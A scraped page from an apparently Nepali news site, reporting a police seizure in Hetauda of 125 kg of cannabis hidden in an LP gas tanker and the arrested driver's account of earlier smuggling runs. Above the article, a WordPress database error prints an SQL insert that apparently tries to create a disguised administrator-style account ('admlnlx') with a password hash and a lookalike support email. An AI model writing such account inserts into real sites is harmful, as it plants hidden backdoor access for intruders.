WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhG1lEH6fFN5t.zkO4NxzFpMlyawvX1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 09:40:56', '', 'admlnlx', 'admlnlx')
हेटौंडा, माघ ३-
प्रहरीले १ सय २५ किलो गाजा सहित २ दुई जनालाई हेटौंडाबाट पक्राउ गरेको छ। मनहरीबाट वीरगञ्ज जाँदै गरेको एच आर सी ८०३७ नम्बरको भारतीय एलपी ग्यास ट्याङकरमा लुकाएको गाँजालाई प्रहरीले विषेश सुराकीको आधारमा पक्राउ गरेको हो।
सोमबार बिहान ३ बजे हेटौंडा १७ रातमाटेबाट गाजा सहित ट्याङ्कर चालक भारत मुजप्फपुरका राजेशप्रसाद कोइरीलाई पक्राउ गरेको मकवानपुरका प्रहरी प्रमुख एसपी बसन्तकुरमार लामाले बताए। प्रहरीले गाजा ओसारपसारमा संलग्न मुख्य व्यक्तिलाई भने पक्राउ गर्न सकेको छैन। पक्राउ परेको सवारी चालकले मकवानपुरको मनहरीबाट बाराको जितपुरसम्म यसअघि ६ पटकसम्म एक टिपको ४० हजारको दरले गाजा पास गरेको प्रहरीलाई बयान दिएको छ।